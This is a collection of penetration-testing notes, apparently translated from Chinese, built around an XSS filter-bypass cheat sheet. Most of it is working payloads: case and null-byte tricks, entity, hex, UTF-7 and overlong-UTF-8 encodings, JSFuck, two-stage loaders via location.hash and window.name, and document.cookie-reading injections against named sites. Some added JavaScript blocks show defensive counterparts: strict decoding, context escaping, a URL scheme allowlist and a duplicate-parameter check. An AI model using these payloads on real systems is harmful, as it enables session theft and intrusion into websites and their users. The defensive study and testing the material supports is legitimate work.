XSS (Cross-Site Scripting) Notes
When verifying XSS vulnerabilities you often run into filtering. How do you verify effectively and get past the filter? Here is a short summary of some common tags, such as <a> and <img>.
Reference links: http://www.jb51.net/tools/xss.htm http://d3adend.org/xss/ghettoBypass
Ghetto XSS Cheatsheet
A ghetto collection of XSS payloads that I find to be useful during penetration tests, especially when faced with WAFs or application-based black-list filtering, but feel free to disagree or shoot your AK-74 in the air.
Simple character manipulations.
Note that I use hexadecimal to represent characters that you probably can't type. For example, \x00 equals a null byte, but you'll need to encode this properly depending on the context (URL encoding \x00 = %00).
HaRdc0r3 caS3 s3nsit1vITy bYpa55!
<sCrIpt>alert(1)</ScRipt>
<iMg srC=1 lAnGuAGE=VbS oNeRroR=mSgbOx(1)>
Null-byte character between HTML attribute name and equal sign (IE, Safari).
<img src='1' onerror\x00=alert(0) />
Slash character between HTML attribute name and equal sign (IE, Firefox, Chrome, Safari).
<img src='1' onerror/=alert(0) />
Vertical tab between HTML attribute name and equal sign (IE, Safari).
<img src='1' onerror\x0b=alert(0) />
Null-byte character between equal sign and JavaScript code (IE).
<img src='1' onerror=\x00alert(0) />
Null-byte character between characters of HTML attribute names (IE).
<img src='1' o\x00nerr\x00or=alert(0) />
Null-byte character before characters of HTML element names (IE).
<\x00img src='1' onerror=alert(0) />
Null-byte character after characters of HTML element names (IE, Safari).
<script\x00>alert(1)</script>
Null-byte character between characters of HTML element names (IE).
<i\x00mg src='1' onerror=alert(0) />
Use slashes instead of whitespace (IE, Firefox, Chrome, Safari).
<img/src='1'/onerror=alert(0)>
Use vertical tabs instead of whitespace (IE, Safari).
<img\x0bsrc='1'\x0bonerror=alert(0)>
Use quotes instead of whitespace in some situations (Safari).
<img src='1''onerror='alert(0)'>
<img src='1'"onerror="alert(0)">
Use null-bytes instead of whitespaces in some situations (IE).
<img src='1'\x00onerror=alert(0)>
Just don't use spaces (IE, Firefox, Chrome, Safari).
<img src='1'onerror=alert(0)>
Prefix URI schemes.
Firefox (\x09, \x0a, \x0d, \x20)
Chrome (Any character \x01 to \x20)
<iframe src="\x01javascript:alert(0)"></iframe> <!-- Example for Chrome -->
No greater-than characters needed (IE, Firefox, Chrome, Safari).
<img src='1' onerror='alert(0)' <
Extra less-than characters (IE, Firefox, Chrome, Safari).
<<script>alert(0)</script>
Backslash character between expression and opening parenthesis (IE).
<style>body{background-color:expression\(alert(1))}</style>
JavaScript Escaping
<script>document.write('<a hr\ef=j\avas\cript\:a\lert(2)>blah</a>');</script>
Encoding Galore.
HTML Attribute Encoding
<img src="1" onerror="alert(1)" />
<img src="1" onerror="&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;" />
<iframe src="javascript:alert(1)"></iframe>
<iframe src="&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;"></iframe>
URL Encoding
<iframe src="javascript:alert(1)"></iframe>
<iframe src="javascript:%61%6c%65%72%74%28%31%29"></iframe>
CSS Hexadecimal Encoding (IE specific examples)
<div style="x:expression(alert(1))">Joker</div>
<div style="x:\65\78\70\72\65\73\73\69\6f\6e(alert(1))">Joker</div>
<div style="x:\000065\000078\000070\000072\000065\000073\000073\000069\00006f\00006e(alert(1))">Joker</div>
<div style="x:\65\78\70\72\65\73\73\69\6f\6e\028 alert \028 1 \029 \029">Joker</div>
JavaScript (hexadecimal, octal, and unicode)
<script>document.write('<img src=1 onerror=alert(1)>');</script>
<script>document.write('\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x31\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x61\x6C\x65\x72\x74\x28\x31\x29\x3E');</script>
<script>document.write('\074\151\155\147\040\163\162\143\075\061\040\157\156\145\162\162\157\162\075\141\154\145\162\164\050\061\051\076');</script>
<script>document.write('\u003C\u0069\u006D\u0067\u0020\u0073\u0072\u0063\u003D\u0031\u0020\u006F\u006E\u0065\u0072\u0072\u006F\u0072\u003D\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029\u003E');</script>
JavaScript (Decimal char codes)
<script>document.write('<img src=1 onerror=alert(1)>');</script>
<script>document.write(String.fromCharCode(60,105,109,103,32,115,114,99,61,49,32,111,110,101,114,114,111,114,61,97,108,101,114,116,40,48,41,62));</script>
JavaScript (Unicode function and variable names)
<script>alert(123)</script>
<script>\u0061\u006C\u0065\u0072\u0074(123)</script>
Overlong UTF-8 (SiteMinder is awesome!)
< = %C0%BC = %E0%80%BC = %F0%80%80%BC
> = %C0%BE = %E0%80%BE = %F0%80%80%BE
' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
" = %C0%A2 = %E0%80%A2 = %F0%80%80%A2
<img src="1" onerror="alert(1)">
%E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE
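The overlong forms get through because the check runs on the raw bytes, where no '<' or '"' exists, while a later, lenient decoder maps %E0%80%BC back to '<'. The block below is an added example and not part of the cheat sheet: a UTF-8 decoder with a strict mode that rejects overlong sequences (what RFC 3629 requires and what current decoders do) and a lenient mode that reproduces the legacy behaviour the bypass depends on, run over the payload above next to a raw-byte filter. The function names are the example's own.

```javascript
// Added example (not from the page): lenient vs strict decoding of the
// overlong UTF-8 payload, and a raw-byte filter that does not see it.

// Percent-decode to raw bytes with no charset interpretation at all.
function percentDecodeToBytes(s) {
  const out = [];
  for (let i = 0; i < s.length; i++) {
    const hex = s.slice(i + 1, i + 3);
    if (s[i] === '%' && /^[0-9a-fA-F]{2}$/.test(hex)) {
      out.push(parseInt(hex, 16));
      i += 2;
    } else {
      out.push(s.charCodeAt(i) & 0xff);
    }
  }
  return Uint8Array.from(out);
}

// Smallest code point each sequence length may legitimately encode (RFC 3629).
const MIN_CODE_POINT = [0, 0, 0x80, 0x800, 0x10000];

// strict=true rejects overlong forms, as every current decoder does.
// strict=false accepts them the way the legacy decoder behind the bypass did,
// so the three bytes %E0%80%BC come out as '<'.
function decodeUtf8(bytes, strict) {
  let out = '';
  for (let i = 0; i < bytes.length; ) {
    const b = bytes[i];
    let len, cp;
    if (b < 0x80)                 { len = 1; cp = b; }
    else if ((b & 0xe0) === 0xc0) { len = 2; cp = b & 0x1f; }
    else if ((b & 0xf0) === 0xe0) { len = 3; cp = b & 0x0f; }
    else if ((b & 0xf8) === 0xf0) { len = 4; cp = b & 0x07; }
    else throw new Error('invalid lead byte at ' + i);
    if (i + len > bytes.length) throw new Error('truncated sequence at ' + i);
    for (let k = 1; k < len; k++) {
      const c = bytes[i + k];
      if ((c & 0xc0) !== 0x80) throw new Error('bad continuation byte at ' + (i + k));
      cp = (cp << 6) | (c & 0x3f);
    }
    if (strict && cp < MIN_CODE_POINT[len]) {
      throw new Error('overlong ' + len + '-byte encoding of U+' +
        cp.toString(16).toUpperCase().padStart(4, '0') + ' at ' + i);
    }
    if (cp > 0x10ffff || (cp >= 0xd800 && cp <= 0xdfff)) {
      throw new Error('code point out of range at ' + i);
    }
    out += String.fromCodePoint(cp);
    i += len;
  }
  return out;
}

// A filter that looks for markup characters (literal or plainly URL-encoded)
// in the bytes it was handed. The overlong form matches neither pattern.
function rawByteFilterRejects(percentEncoded) {
  return /[<>"']/.test(percentEncoded) || /%(3c|3e|22|27)/i.test(percentEncoded);
}

// Run one input through the filter and both decoder modes.
function compareDecoders(percentEncoded) {
  const bytes = percentDecodeToBytes(percentEncoded);
  let strictError = null;
  try { decodeUtf8(bytes, true); } catch (e) { strictError = e.message; }
  return {
    filterRejected: rawByteFilterRejects(percentEncoded),
    lenient: decodeUtf8(bytes, false),
    strictError,
  };
}

// The cheat sheet's own overlong payload from the section above.
const OVERLONG_PAYLOAD =
  '%E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE';
```

The mitigation this illustrates is ordering: decode (strictly) first, then validate the decoded text, and reject input the strict decoder refuses instead of passing it on to a component that may be more forgiving.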
UTF-7 (Missing charset?)
<img src="1" onerror="alert(1)" />
+ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-
Unicode .NET Ugliness
<script>alert(1)</script>
%uff1cscript%uff1ealert(1)%uff1c/script%uff1e
Classic ASP performs some unicode homoglyphic translations... don't ask why...
<img src="1" onerror="alert('1')">
%u3008img%20src%3D%221%22%20onerror%3D%22alert(%uFF071%uFF07)%22%u232A
Useless and/or Useful features.
HTML 5 (Not comprehensive)
<video src="http://www.w3schools.com/html5/movie.ogg" onloadedmetadata="alert(1)" />
<video src="http://www.w3schools.com/html5/movie.ogg" onloadstart="alert(1)" />
Usage of non-existent elements (IE)
<blah style="blah:expression(alert(1))" />
CSS Comments (IE)
<div style="z:exp/*anything*/res/*here*/sion(alert(1))" />
Alternate ways of executing JavaScript functions
<script>window['alert'](0)</script>
<script>parent['alert'](1)</script>
<script>self['alert'](2)</script>
<script>top['alert'](3)</script>
Split up JavaScript into HTML attributes
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
HTML is parsed before JavaScript
<script>
var junk = '</script><script>alert(1)</script>';
</script>
HTML is parsed before CSS
<style>
body { background-image:url('http://www.blah.com/</style><script>alert(1)</script>'); }
</style>
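Both snippets above work for the same reason: the HTML tokenizer ends a script or style element at the first "</script" or "</style" it meets, and it neither knows nor cares that those characters sit inside a JavaScript string or a CSS url(). The block below is an added example, not from the page: a check that reports where the tokenizer would close the element, beside the encoding a template should apply before placing data inside a script (JSON with '<', '>', '&' and the line separators written as \u escapes) or inside a CSS url (percent-encoding the delimiters). The function names are the example's own, and the tokenizer's "<!--" escaped states are not modelled.

```javascript
// Added example (not from the page): where the HTML tokenizer would close a
// <script> or <style> element, and encodings that keep that from happening
// when untrusted data is embedded inside one.

// HTML "script data"/"raw text" end-tag rule: "</" + the tag name, matched
// ASCII case-insensitively, followed by whitespace, "/" or ">". Returns the
// index of that sequence or -1. (The "<!--" escaped states are not modelled.)
function rawTextEndsAt(body, tagName) {
  const re = new RegExp('</' + tagName + '(?=[\\t\\n\\f\\r />])', 'i');
  const m = re.exec(body);
  return m ? m.index : -1;
}

// JSON.stringify yields a valid JS literal; additionally write "<", ">", "&"
// and the two line terminators JSON leaves alone as \u escapes, so the bytes
// "</script" never reach the HTML tokenizer while the JS engine still decodes them.
function jsonForScript(value) {
  return JSON.stringify(value).replace(/[<>&\u2028\u2029]/g,
    c => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// For a URL inside url('...') in a style block: percent-encode the characters
// that could end the string, the url() token or the element.
function urlForStyle(href) {
  return href.replace(/[<>"'()\\\s]/g,
    c => '%' + c.charCodeAt(0).toString(16).toUpperCase().padStart(2, '0'));
}

// The page's naive pattern (data pasted into a quoted JS string) next to the
// escaped form, rendered as the body of a <script> element.
function renderNaiveScript(data) { return "var junk = '" + data + "';"; }
function renderSafeScript(data)  { return 'var junk = ' + jsonForScript(data) + ';'; }

// Same for the <style> case from the page.
function renderNaiveStyle(href) { return "body { background-image:url('" + href + "'); }"; }
function renderSafeStyle(href)  { return "body { background-image:url('" + urlForStyle(href) + "'); }"; }

// Evaluate the safe script body and return what `junk` holds, to show the
// escaping is transparent to JavaScript.
function valueSeenByJs(data) {
  return new Function(renderSafeScript(data) + ' return junk;')();
}
```

The point of the two rendering pairs is that JavaScript-level escaping (backslashes, quotes) is the wrong layer: the HTML parser runs first, so the data has to be made safe for the HTML context before the script or style context ever sees it.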
XSS in XML documents [doctype = text/xml] (Firefox, Chrome, Safari).
<?xml version="1.0" ?>
<someElement>
<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>
</someElement>
URI Schemes
<iframe src="javascript:alert(1)"></iframe>
<iframe src="vbscript:msgbox(1)"></iframe> (IE)
<iframe src="data:text/html,<script>alert(0)</script>"></iframe> (Firefox, Chrome, Safari)
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe> (Firefox, Chrome, Safari)
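The scheme list above, the control characters Firefox and Chrome tolerate in front of a scheme (Prefix URI schemes), and the entity-encoded javascript: from the HTML Attribute Encoding section all defeat a check that merely looks for the string javascript: in the raw attribute value. The block below is an added example, not from the page: it normalizes a URL attribute roughly the way a browser does (entity decoding, stripping of control characters, case folding) and then applies a scheme allowlist, next to the literal blocklist the payloads get past. The same check applies to the <a href> payloads in the second half of this page. The function names and the small entity table are the example's own; a production template engine should use a full HTML entity decoder.

```javascript
// Added example (not from the page): validating a value destined for href/src.

// Decode numeric character references and the few named ones that matter for
// scheme smuggling (a deliberately small table; real code should use a
// complete HTML entity decoder).
function decodeEntities(s) {
  const named = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'",
                  colon: ':', tab: '\t', newline: '\n' };
  return s.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);?/gi, (whole, body) => {
    if (body[0] === '#') {
      const cp = body[1].toLowerCase() === 'x'
        ? parseInt(body.slice(2), 16)
        : parseInt(body.slice(1), 10);
      return cp <= 0x10ffff ? String.fromCodePoint(cp) : whole;
    }
    const n = named[body.toLowerCase()];
    return n !== undefined ? n : whole;
  });
}

// Normalize before looking at the scheme: decode entities, drop ASCII control
// characters and spaces anywhere (browsers strip tab/newline anywhere and
// leading controls; dropping more is only stricter), then case-fold.
function normalizeForScheme(raw) {
  return decodeEntities(raw).replace(/[\x00-\x20\x7f]/g, '').toLowerCase();
}

// Blocklist check of the kind the cheat sheet is written to bypass: looks for
// a dangerous scheme literally at the start of the raw attribute value.
function blocklistAllows(raw) {
  return !/^\s*(javascript|vbscript|data):/i.test(raw);
}

// Allowlist check: only http, https, mailto and scheme-less (relative) URLs pass.
function allowlistAllows(raw, allowed = ['http', 'https', 'mailto']) {
  const v = normalizeForScheme(raw);
  const m = /^([a-z][a-z0-9+.-]*):/.exec(v);
  if (!m) return true; // no scheme: relative URL
  return allowed.includes(m[1]);
}
```

The allowlist is the part that matters: every new obfuscation of javascript: has to survive normalization and still not be http, https or mailto, whereas a blocklist has to anticipate each obfuscation in advance.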
HTTP Parameter Pollution
http://target.com/something.xxx?a=val1&a=val2
ASP.NET: a = val1,val2
ASP:     a = val1,val2
JSP:     a = val1
PHP:     a = val2
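The table records that one query string means different things to different back ends, which is what lets a filter inspect one value while the application uses another. The block below is an added example, not from the page: a query-string parser that reproduces the four listed behaviours, and a duplicate-parameter check a gateway can use to reject the ambiguous request instead of guessing which value wins. The function names are the example's own; the platform behaviours are the ones the table states.

```javascript
// Added example (not from the page): how duplicate query parameters resolve
// on the platforms listed above, and a check that flags the ambiguity.

// Parse a query string into an ordered list of [name, value] pairs, keeping
// duplicates and decoding percent-escapes and "+" the way form encoding does.
function parsePairs(query) {
  const dec = s => decodeURIComponent(s.replace(/\+/g, ' '));
  return query.replace(/^\?/, '').split('&').filter(Boolean).map(part => {
    const i = part.indexOf('=');
    return i < 0 ? [dec(part), ''] : [dec(part.slice(0, i)), dec(part.slice(i + 1))];
  });
}

// Behaviours from the table: ASP.NET and classic ASP join all values with a
// comma, JSP returns the first occurrence, PHP keeps the last.
const RESOLVERS = {
  'ASP.NET': values => values.join(','),
  'ASP':     values => values.join(','),
  'JSP':     values => values[0],
  'PHP':     values => values[values.length - 1],
};

// Value the named platform would hand the application for `name`.
function resolveParam(query, name, platform) {
  const values = parsePairs(query).filter(([k]) => k === name).map(([, v]) => v);
  if (values.length === 0) return undefined;
  return RESOLVERS[platform](values);
}

// Defensive check: every parameter name that appears more than once, so a
// gateway can reject the request rather than guess which value wins.
function duplicateParams(query) {
  const counts = new Map();
  for (const [k] of parsePairs(query)) counts.set(k, (counts.get(k) || 0) + 1);
  return [...counts].filter(([, n]) => n > 1).map(([k]) => k);
}
```

Whatever sits in front of the application (proxy, WAF, API gateway) should resolve duplicates with the same rule the application uses, or simply refuse requests where duplicateParams is non-empty.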
Two Stage XSS via fragment identifier (bypass length restrictions / avoid server logging)
<script>eval(location.hash.slice(1))</script>
<script>eval(location.hash)</script> (Firefox)
http://target.com/something.jsp?inject=<script>eval(location.hash.slice(1))</script>#alert(1)
Two Stage XSS via name attribute
<iframe src="http://target.com/something.jsp?inject=<script>eval(name)</script>" name="alert(1)"></iframe>
Non-alphanumeric craziness...
<script>
$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();
</script>
<script>
(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]
+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()
</script>
';alert(String.fromCharCode(88,83,83))//
\';alert(String.fromCharCode(88,83,83))//
";alert(String.fromCharCode(88,83,83))//
\";alert(String.fromCharCode(88,83,83))//
--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<iframe src="http://www.baidu.com" height="250" width="300"></iframe>
<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 50, 51, 41))</script>
<script>alert(String.fromCharCode(88, 83, 83))</script>
<script>alert('xss')</script>
<p><svg onload=prompt(/xss/)></p> // I have run into this case
%253Csvg%2520onload%253Dprompt(/xss/)%253E // <, > and = double URL-encoded
When a plus sign is used for string concatenation, the JS placed in between gets executed:
http://xsst.sinaapp.com/example/test1-2.php?page=1%27%2balert(document.cookie)%2b%27
http://xsst.sinaapp.com/example/test1-2-3.php?page=%27%2bjQuery.globalEval(%27a%27%2b%27lert%27%2b%27(document.cookie)%27)%2b%27
The <img> tag
XSS exploitation 1:
<img src=javascript:alert('xss')> // only executes in IE7.0|IE6.0
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> // only executes in IE7.0|IE6.0
<img src="URL" style='Xss:expression(alert(/xss/));'> // only executes in IE7.0|IE6.0
XSS via CSS markup
<img STYLE="background-image:url(javascript:alert('XSS'))"> // only executes in IE7.0|IE6.0
XSS with the CSS stylesheet markup encoded
<img STYLE="background-image:\75\72\6c\28\6a\61\76\61\73\63\72\69\70\74\3a\61\6c\65\72\74\28\27\58\53\53\27\29\29"> // only executes in IE7.0|IE6.0
XSS exploitation 2:
<img src="x" onerror="alert(1)"> // the " and ; can be omitted
Original code:
<img src="x" onerror="alert(1)">
<img src="1" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img> // the double quotes are required, otherwise it does not execute
Original code:
<img src="1" onerror=eval("alert('xss')")></img> // the double quotes can be removed
XSS exploitation 3:
<img src=1 onerror=alert('xss')>
<img src=1 onmouseover=alert('xss') a1=1111>
The <a> tag
Standard format:
<a href="http://www.baidu.com">百度</a>
XSS exploitation 1:
<a href="javascript:alert('xss')">2</a> // the double quotes can be removed
<a href=javascript:eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")>2</a> // the double quotes cannot be removed
<a href=javascript:eval("alert('xss')")>2</a> // the double quotes can be removed
Original code:
<a href=javascript:eval("alert('xss')")>2</a>
<a href="javascript:aaa" onmouseover="alert(/xss/)">22222222</a>
<a href="javascript:alert("xss")">2</a>
<a href=javascript:alert(/xss/)>XSStest</a>
Original code:
<a href="javascript:alert('xss')">2</a>
XSS exploitation 2:
<a href="data:text/html;base64, PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">test</a> // base64 encoded; Chrome parses it successfully
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">test</a>
Original code:
PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=
<script>alert('xss')</script>
XSS exploitation 3:
<a href="" onclick="alert(1)">aaaaa</a> // the double quotes and ; can be removed
Original code:
<a href="" onclick="alert(1)">aaaaa</a>
<a href="" onclick=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")>aaaaa</a>
<a href="" onclick=eval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')>aaaaa</a> // single and double quotes both work
<a href="" onclick=eval(alert('xss'))>aaaaa</a> // pops up successfully; when typed into the URL bar it must be URL-encoded
Original code:
eval("alert('xss')")
<a href="#" onclick=alert('\170\163\163')>test3</a> // executes successfully
Original code:
<a href="#" onclick=alert('xss')>test3</a>
XSS exploitation 4:
<a href=kycg.asp?ttt=1000 onmouseover=prompt(123) y=2016>2</a> // pops up a dialog
The <input> tag
General format: <INPUT name="name" value="">
<input value="" onclick="alert(11)" type="text">
<INPUT name="name" value="01/01/1967" onmouseover=prompt(971874) bad="">
<INPUT name="name" value=""><script>alert(123)</script>
Tips:
When XSS meets an input with the hidden attribute
1. Break out with expression
<input type=hidden style=`x:expression(alert(/xss/))`>
This uses the CSS expression property directly to break out; the trick applies to IE6 and below.
2. Break out with accesskey
<input type="hidden" accesskey="X" onclick="alert(/xss/)">
After inserting it, the ALT+SHIFT+X shortcut triggers the XSS. I tested this method in Firefox; other browsers are unknown.
A span tag like this one, which has no trigger point on the page, can be used the same way.
<span id="span" recieveurl='xxxeId=1' accesskey='X' onclick='alert(/xss/)' bad=""></span>
The <form> tag
<form method=Post action=kycg.asp?ttt=1000 onmouseover=prompt(962613) y=&enddate=2016 > # a space directly after the action value
<input type='text' name='page' value=0>
<input name='submit' type='submit' value='GO' class="input2">
</form>
<form method=Post action=javascript:alert('xss') >
<input type='text' name='page' value=0>
<input name='submit' type='submit' value='GO' class="input2">
</form>
<form method=Post action=1 onmouseover=alert(123) bbb=111 >
<input type='text' name='page' value=0>
<input name='submit' type='submit' value='GO' class="input2">
</form>
<form method=Post action="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">
<input type='text' name='page' value=0>
<input name='submit' type='submit' value='GO' class="input2">
</form>
The <iframe> tag
<iframe src=javascript:alert('xss');height=0 width=0 /></iframe>
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">
<iframe src="data:text/html,<script>alert(1)</script>"></iframe> // pops up in Chrome
<iframe src=1 onmouseover=alert('xss') y=2016 /></iframe>
<iframe src="javascript:prompt(`xss`);" frameborder="0" width="100%" height="1120px"></iframe> // a slightly unusual one I ran into
<iframe src="vbscript:msgbox(123)"></iframe>
A DOM XSS I ran into, recorded here:
123
<script type="text/javascript">
document.write(unescape("%3Cscript src='/visit_log.jspx%3Furl%3D")+document.location.href+unescape("%26referrer%3D")+document.referrer+unescape("' type='text/javascript'%3E%3C/script%3E"));
</script>
http://192.168.106.141/1.html
Referer:http://%22'accesskey='X'onclick='alert(/xss/)'//
DOM case two:
<script type="text/javascript">
function SetCookie(sName, sValue, timeKeep)
{
    var now = new Date();
    var expireTime = new Date(now.valueOf() + timeKeep*60000*60);
    document.cookie = sName + "=" + escape(sValue) + "; path=/; expires=" + expireTime.toGMTString() + ";";
}
function GetCookie(sName)
{
    var aCookie = document.cookie.split("; ");
    for (var i=0; i < aCookie.length; i++)
    {
        var aCrumb = aCookie[i].split("=");
        if (sName == aCrumb[0])
            return unescape(aCrumb[1]);
    }
    return null;
}
function GetCurrentDateTime()
{
    var date = new Date();
    var current = new String("");
    current += date.getFullYear() + "-";
    current += date.getMonth() + 1 + "-";
    current += date.getDate() + " ";
    current += date.getHours() + ":";
    current += date.getMinutes() + ":";
    current += date.getSeconds();
    return current;
}
function AddTrackerCount(url, siteID){
    try{
        var str_cookie_unique = "tracker_cookie_" + siteID;
        var str_cookie_datetime = "tracker_cookie_datetime_" + siteID;
        var str_firstAccessUser;
        if (GetCookie(str_cookie_unique)==null)
        {
            str_firstAccessUser = "True";
            SetCookie(str_cookie_unique, "True", 24);
        }
        else
            str_firstAccessUser = "False";
